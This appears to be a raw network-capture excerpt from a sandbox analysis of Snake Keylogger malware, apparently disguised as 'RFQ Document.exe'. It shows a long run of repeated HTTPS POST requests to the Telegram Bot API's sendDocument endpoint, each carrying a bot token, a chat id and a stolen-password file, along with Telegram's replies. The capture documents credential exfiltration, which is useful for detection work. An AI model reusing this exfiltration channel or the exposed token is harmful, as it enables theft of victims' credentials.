                                            2021-09-28 05:59:38 UTC397INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12837,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808778,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            25192.168.2.449799149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:25 UTC39OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c4e1c0b2
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:25 UTC40OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 34 65 31 63 30 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c4e1c0b2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:25 UTC40INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:25 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:25 UTC40INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12605,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808705,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            250192.168.2.450076149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:38 UTC397OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f06e24ed
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:38 UTC398OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 30 36 65 32 34 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f06e24edContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:38 UTC398INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:38 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:38 UTC398INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12838,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808778,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            251192.168.2.450078149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:39 UTC399OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f08ac29c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:39 UTC399OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 30 38 61 63 32 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f08ac29cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:39 UTC400INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:39 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:39 UTC400INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12839,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808779,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            252192.168.2.450080149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:39 UTC401OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f0a9c21a
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:39 UTC401OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 30 61 39 63 32 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f0a9c21aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:39 UTC401INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:39 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:39 UTC402INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12840,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808779,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            253192.168.2.450082149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:39 UTC402OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f0cfe7e3
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:39 UTC403OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 30 63 66 65 37 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f0cfe7e3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:39 UTC403INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:39 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:39 UTC403INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12841,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808779,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            254192.168.2.450084149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:39 UTC404OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f0f60d43
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:39 UTC404OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 30 66 36 30 64 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f0f60d43Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:39 UTC405INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:39 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:39 UTC405INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12842,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808779,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            255192.168.2.450087149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:40 UTC405OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f11c3109
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:40 UTC406OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 31 31 63 33 31 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f11c3109Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:40 UTC406INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:40 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:40 UTC407INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 30 2c 22 64
